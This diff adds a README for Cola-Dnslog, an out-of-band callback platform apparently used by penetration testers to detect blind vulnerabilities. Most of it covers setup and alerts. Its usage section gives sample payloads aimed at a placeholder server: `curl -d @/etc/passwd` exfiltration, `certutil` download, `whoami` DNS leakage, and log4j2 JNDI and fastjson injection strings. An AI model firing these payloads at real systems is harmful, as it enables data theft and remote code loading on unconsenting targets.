| 1 | + | ## Cola-Dnslog <https://github.com/AbelChe/cola_dnslog> |
| 2 | + | <!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e--> |
| 3 | + | ![Language](https://img.shields.io/badge/Language-Python-blue) |
| 4 | + | ![Author](https://img.shields.io/badge/Author-AbelChe-orange) |
| 5 | + | ![GitHub stars](https://img.shields.io/github/stars/AbelChe/cola_dnslog.svg?style=flat&logo=github) |
| 6 | + | ![Version](https://img.shields.io/badge/Version-V0.0.1-red) |
| 7 | + | ![Time](https://img.shields.io/badge/Join-20220829-green) |
| 8 | + | <!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451--> |
| 9 | + | |
| 10 | + | Cola Dnslog 是一款更加强大的dnslog平台(无回显漏洞探测辅助平台), |
| 11 | + | |
| 12 | + | - 完全开源 |
| 13 | + | - 支持dns http ldap rmi等协议 |
| 14 | + | - 提供API调用方式便于与其他工具结合 |
| 15 | + | - 支持钉钉机器人、Bark等提醒 |
| 16 | + | - 支持docker一键部署 |
| 17 | + | |
| 18 | + | |
| 19 | + | ------ |
| 20 | + | |
| 21 | + | 涉及到技术、框架: |
| 22 | + | |
| 23 | + | `dns` `http` `ldap` `rmi` `webui` `vue-element-admin` `fastapi` `sqlite` |
| 24 | + | |
| 25 | + | 可帮助检测漏洞: |
| 26 | + | |
| 27 | + | `log4j2` `fastjson` `ruoyi` `Spring` `RCE` `Blind SQL` `Bland XXE` |
| 28 | + | |
| 29 | + | 特色: |
| 30 | + | |
| 31 | + | `Dingtalk Robot` `Bark` `API` `ldaplog` `rmilog` `Docker` |
| 32 | + | |
| 33 | + | |
| 34 | + | ## 🥯 使用方法 |
| 35 | + | |
| 36 | + | > 假设你购买的域名为`example.com` |
| 37 | + | > |
| 38 | + | > 你的vps ip为`1.1.1.1` |
| 39 | + | |
| 40 | + | ### 域名 |
| 41 | + | |
| 42 | + | 请自行购买域名,并将域名的解析服务器托管至部署cola_dnslog的服务器 |
| 43 | + | |
| 44 | + | 以godaddy为例 |
| 45 | + | |
| 46 | + | 1. 配置域名解析处右上角三个点,点击Host Names |
| 47 | + | |
| 48 | + | ![image-20220717175903352](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220717175903352.png) |
| 49 | + | |
| 50 | + | 2. 修改或新增主机名如下图所示,ip地址填写你的vps地址即可 |
| 51 | + | |
| 52 | + | ![image-20220717180002176](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220717180002176.png) |
| 53 | + | |
| 54 | + | 3. 回到dns管理,将域名服务器修改为`ns1.example.com`和`ns2.example.com` |
| 55 | + | |
| 56 | + | ![image-20220717180242944](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220717180242944.png) |
| 57 | + | |
| 58 | + | ### 安装部署 |
| 59 | + | |
| 60 | + | #### Docker(推荐) |
| 61 | + | |
| 62 | + | ##### 一键启动(推荐) |
| 63 | + | |
| 64 | + | 1. 下载源码 |
| 65 | + | |
| 66 | + | ```sh |
| 67 | + | git clone https://github.com/Abelche/cola_dnslog.git |
| 68 | + | cd cola_dnslog |
| 69 | + | ``` |
| 70 | + | |
| 71 | + | 2. 修改docker-compose.yml中environment变量 |
| 72 | + | |
| 73 | + | ```yml |
| 74 | + | ... |
| 75 | + | server: |
| 76 | + | ... |
| 77 | + | environment: |
| 78 | + | DNS_DOMAIN: example.com # 自己的域名 |
| 79 | + | NS1_DOMAIN: ns1.example.com # ns1绑定 |
| 80 | + | NS2_DOMAIN: ns2.example.com # ns2绑定 |
| 81 | + | SERVER_IP: 1.1.1.1 # vps ip |
| 82 | + | ... |
| 83 | + | front: |
| 84 | + | ... |
| 85 | + | environment: |
| 86 | + | API_BASE_URL: 'http://1.1.1.1:28001' # http://vpsip:28001 |
| 87 | + | ... |
| 88 | + | |
| 89 | + | ``` |
| 90 | + | |
| 91 | + | 3. 启动 |
| 92 | + | |
| 93 | + | ```sh |
| 94 | + | docker-compose up -d |
| 95 | + | ``` |
| 96 | + | |
| 97 | + | 4. 启动之后查看docker日志或者查看info.txt获取账号信息 |
| 98 | + | |
| 99 | + | > server端程序运行会在程序根目录创建一个info.txt用于记录初始化的账号信息 |
| 100 | + | |
| 101 | + | ```sh |
| 102 | + | docker-compose logs |
| 103 | + | docker exec -it <container_id> cat /coladnslog/info.txt |
| 104 | + | ``` |
| 105 | + | |
| 106 | + | ![image-20220812005813825](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220812005813825.png) |
| 107 | + | |
| 108 | + | > 如果需要自定义端口,请修改`docker-compose.yml`的端口映射`ports`即可 |
| 109 | + | |
| 110 | + | |
| 111 | + | |
| 112 | + | ##### 前后端分离部署 |
| 113 | + | |
| 114 | + | 服务端: |
| 115 | + | |
| 116 | + | ```sh |
| 117 | + | git clone https://github.com/Abelche/cola_dnslog.git |
| 118 | + | cd cola_dnslog |
| 119 | + | |
| 120 | + | docker build -t coladnslog_server -f Dockerfile_server . |
| 121 | + | docker run -itd -p 53:53/udp \ |
| 122 | + | -p 80:80 \ |
| 123 | + | -p 1099:1099 \ |
| 124 | + | -p 1389:1389 \ |
| 125 | + | -p 28001:28001 \ |
| 126 | + | -e DNS_DOMAIN=example.com \ |
| 127 | + | -e NS1_DOMAIN=ns1.example.com \ |
| 128 | + | -e NS2_DOMAIN=ns2.example.com \ |
| 129 | + | -e SERVER_IP=1.1.1.1 \ |
| 130 | + | --name ColaDnslog_server coladnslog_server |
| 131 | + | ``` |
| 132 | + | |
| 133 | + | 客户端: |
| 134 | + | |
| 135 | + | ```sh |
| 136 | + | git clone https://github.com/Abelche/cola_dnslog.git |
| 137 | + | cd cola_dnslog |
| 138 | + | |
| 139 | + | sudo docker build -t coladnslogfront -f Dockerfile_front . |
| 140 | + | sudo docker run -itd -p 18080:18080 coladnslogfront |
| 141 | + | ``` |
| 142 | + | |
| 143 | + | |
| 144 | + | |
| 145 | + | #### 源码安装 |
| 146 | + | |
| 147 | + | 共分四步 |
| 148 | + | |
| 149 | + | ##### **第一步 下载源码** |
| 150 | + | |
| 151 | + | 下载源码 |
| 152 | + | |
| 153 | + | ```sh |
| 154 | + | git clone https://github.com/Abelche/cola_dnslog.git |
| 155 | + | ``` |
| 156 | + | |
| 157 | + | > 我习惯于将服务用`tmux`放到后台运行 |
| 158 | + | |
| 159 | + | ##### **第二步 启动webserver** |
| 160 | + | |
| 161 | + | 安装python(python>=3.7)依赖 |
| 162 | + | |
| 163 | + | 注意,需要用python3.7及以上版本,否则会有兼容性问题,多python推荐使用conda |
| 164 | + | |
| 165 | + | ```sh |
| 166 | + | cd cola_dnslog |
| 167 | + | pip install -r requirements.txt |
| 168 | + | ``` |
| 169 | + | |
| 170 | + | 修改根目录下的`config.yaml` |
| 171 | + | |
| 172 | + | 主要需要修改`DNS_DOMAIN` `NS1_DOMAIN` `NS2_DOMAIN` `SERVER_IP` |
| 173 | + | |
| 174 | + | 可选: 修改`HTTP_RESPONSE_SERVER_VERSION`伪造http返回中Server字段 |
| 175 | + | |
| 176 | + | ```yaml |
| 177 | + | global: |
| 178 | + | DB_FILENAME: sqlite.db |
| 179 | + | |
| 180 | + | logserver: |
| 181 | + | DNS_DOMAIN: example.com |
| 182 | + | NS1_DOMAIN: ns1.example.com |
| 183 | + | NS2_DOMAIN: ns2.example.com |
| 184 | + | SERVER_IP: 1.1.1.1 |
| 185 | + | DNS_PORT: 53 |
| 186 | + | HTTP_HOST: 0.0.0.0 |
| 187 | + | HTTP_PORT: 80 |
| 188 | + | HTTP_RESPONSE_SERVER_VERSION: nginx |
| 189 | + | LDAP_HOST: 0.0.0.0 |
| 190 | + | LDAP_PORT: 1389 |
| 191 | + | RMI_HOST: 0.0.0.0 |
| 192 | + | RMI_PORT: 1099 |
| 193 | + | |
| 194 | + | webserver: |
| 195 | + | HOST: 0.0.0.0 |
| 196 | + | PORT: 28001 |
| 197 | + | PASSWORD_SALT: 随便一长串字符串,如:cuau89j2iifdas8 |
| 198 | + | ``` |
| 199 | + | |
| 200 | + | 启动webserber端和logserver端,注意这里一定要先启动webserver端(因为要先通过webserver端初始化数据库,初始化之后会在终端输出账号、密码、token、logid等信息。 |
| 201 | + | |
| 202 | + | ```sh |
| 203 | + | chmod +x start_webserver |
| 204 | + | ./start_webserver |
| 205 | + | ``` |
| 206 | + | |
| 207 | + | ![image-20220730035846090](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220730035846090.png) |
| 208 | + | |
| 209 | + | |
| 210 | + | |
| 211 | + | ##### **第三步 启动logserver** |
| 212 | + | |
| 213 | + | ```sh |
| 214 | + | chmod +x start_logserver |
| 215 | + | ./start_logserver |
| 216 | + | ``` |
| 217 | + | |
| 218 | + | ![image-20220730160132103](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220730160132103.png) |
| 219 | + | |
| 220 | + | |
| 221 | + | |
| 222 | + | ##### **第四步 启动前端** |
| 223 | + | |
| 224 | + | 现在来到前端(不一定要和webserver放在一起,你甚至可以通过electron打包成本地客户端),先修改配置文件`.env.production` |
| 225 | + | |
| 226 | + | ```sh |
| 227 | + | cd src/app/front |
| 228 | + | vim .env.production |
| 229 | + | ``` |
| 230 | + | |
| 231 | + | ```ini |
| 232 | + | # just a flag |
| 233 | + | ENV = 'production' |
| 234 | + | |
| 235 | + | # base api |
| 236 | + | VUE_APP_BASE_API = 'http://1.1.1.1:28001' |
| 237 | + | |
| 238 | + | TARGET_API = 'http://1.1.1.1:28001' |
| 239 | + | ``` |
| 240 | + | |
| 241 | + | 然后npm安装依赖、打包、启动http服务(这里可以随意选择http服务器,为了方便我直接用python启动) |
| 242 | + | |
| 243 | + | ```sh |
| 244 | + | cd src/front |
| 245 | + | npm install |
| 246 | + | npm run build:prod |
| 247 | + | |
| 248 | + | cd dist |
| 249 | + | python3 -m http.server 18001 |
| 250 | + | ``` |
| 251 | + | |
| 252 | + | 至此,三端(webserver端、logserver端、webui前端)已经全部开启! |
| 253 | + | |
| 254 | + | 这时,访问http://1.1.1.1:18001应该可以看到登录页面! |
| 255 | + | |
| 256 | + | 玩得开心! |
| 257 | + | |
| 258 | + | ### 钉钉机器人 |
| 259 | + | |
| 260 | + | 在钉钉群新建机器人,安全设置:添加自定义关键词`coladnslog` |
| 261 | + | |
| 262 | + | ![image-20220731231424000](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220731231424000.png) |
| 263 | + | |
| 264 | + | 并获取到webhook的token,注意,只需要填写token即可 |
| 265 | + | |
| 266 | + | ![image-20220731231912885](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220731231912885.png) |
| 267 | + | |
| 268 | + | 进入webui,修改Dingtalk Robot Token为上文获取的token,点击Update保存即可 |
| 269 | + | |
| 270 | + | ![image-20220802020311279](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220802020311279.png) |
| 271 | + | |
| 272 | + | 效果如下: |
| 273 | + | |
| 274 | + | <img src="https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220731231301577.png" alt="image-20220731231301577" style="zoom:33%;" /> |
| 275 | + | |
| 276 | + | ### Bark |
| 277 | + | |
| 278 | + | [Finb/Bark: Bark is an iOS App which allows you to push custom notifications to your iPhone (github.com)](https://github.com/Finb/Bark) |
| 279 | + | |
| 280 | + | [Finb/bark-server: Backend of Bark (github.com)](https://github.com/Finb/bark-server) |
| 281 | + | |
| 282 | + | 同上 进入webui,开启Bark开关,然后修改bark url,点击Update保存 |
| 283 | + | |
| 284 | + | ![image-20220802015907678](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220802015907678.png) |
| 285 | + | |
| 286 | + | 效果如下: |
| 287 | + | |
| 288 | + | <img src="https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220802015642879.png" alt="image-20220802015642879" style="zoom: 25%;" /> |
| 289 | + | |
| 290 | + | ### 如何使用 |
| 291 | + | |
| 292 | + | 上文提到,假定我的域名和ip是`example.com`和`1.1.1.1`,并且我们账户的logid为`qrq` |
| 293 | + | |
| 294 | + | #### DNS |
| 295 | + | |
| 296 | + | ```sh |
| 297 | + | nsloopup `whoami`.qrq.example.com |
| 298 | + | ping `whoami`.qrq.example.com |
| 299 | + | ``` |
| 300 | + | |
| 301 | + | #### HTTP |
| 302 | + | |
| 303 | + | ```sh |
| 304 | + | curl 1.1.1.1/qrq/some/info |
| 305 | + | curl -d @/etc/passwd 1.1.1.1/qrq/postdata |
| 306 | + | certutil -urlcache -split -f http://1.1.1.1/x x |
| 307 | + | ``` |
| 308 | + | |
| 309 | + | #### LDAP |
| 310 | + | |
| 311 | + | log4j2 fastjson等可以使用此方法 |
| 312 | + | |
| 313 | + | 注意这里必须要令最后路径的最后作为logid,如:`ldapqrq` `xxxxqrq` `qrq` `xxx/qrq` |
| 314 | + | |
| 315 | + | ``` |
| 316 | + | ${jndi:ldap://1.1.1.1:1389/ldapqrq} |
| 317 | + | {"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://1.1.1.1:1389/ldapqrq", "autoCommit":true} |
| 318 | + | ``` |
| 319 | + | |
| 320 | + | #### RMI |
| 321 | + | |
| 322 | + | 同上,log4j2 fastjson等 |
| 323 | + | |
| 324 | + | ``` |
| 325 | + | ${jndi:rmi://1.1.1.1:1099/rmiqrq} |
| 326 | + | { "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://1.1.1.1:1099/rmiqrq", "autoCommit":true } } |
| 327 | + | ``` |
| 328 | + | |
| 329 | + | ## 👀 概览 |
| 330 | + | |
| 331 | + | ### 登录 |
| 332 | + | |
| 333 | + | ![image-20220730151326711](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220730151326711.png) |
| 334 | + | |
| 335 | + | |
| 336 | + | |
| 337 | + | ### 首页 |
| 338 | + | |
| 339 | + | ![image-20220731143149729](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220731143149729.png) |
| 340 | + | |
| 341 | + | |
| 342 | + | |
| 343 | + | ### Dnslog |
| 344 | + | |
| 345 | + | ![image-20220730151604227](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220730151604227.png) |
| 346 | + | |
| 347 | + | |
| 348 | + | |
| 349 | + | ### Httplog |
| 350 | + | |
| 351 | + | ![image-20220730151741311](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220730151741311.png) |
| 352 | + | |
| 353 | + | |
| 354 | + | |
| 355 | + | ### Ldaplog |
| 356 | + | |
| 357 | + | ![image-20220730151826344](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220730151826344.png) |
| 358 | + | |
| 359 | + | |
| 360 | + | |
| 361 | + | ### Rmilog |
| 362 | + | |
| 363 | + | ![image-20220730151921478](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220730151921478.png) |
| 364 | + | |
| 365 | + | |
| 366 | + | |
| 367 | + | ### 账号信息 |
| 368 | + | |
| 369 | + | ![image-20220801003540673](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220801003540673.png) |
| 370 | + | |
| 371 | + | |
| 372 | + | |
| 373 | + | ### 钉钉机器人 |
| 374 | + | |
| 375 | + | <img src="https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220731231301577.png" alt="image-20220731231301577" style="zoom: 25%;" /> |
| 376 | + | |
| 377 | + | |
| 378 | + | |
| 379 | + | ### Bark |
| 380 | + | |
| 381 | + | <img src="https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220802015642879.png" alt="image-20220802015642879" style="zoom: 25%;" /> |
| 382 | + | |
| 383 | + | |
| 384 | + | <!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b--> |
| 385 | + | ## 项目相关 |
| 386 | + | |
| 387 | + | |
| 388 | + | ## 最近更新 |
| 389 | + | |
| 390 | + | <!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527--> |
| 391 | + | |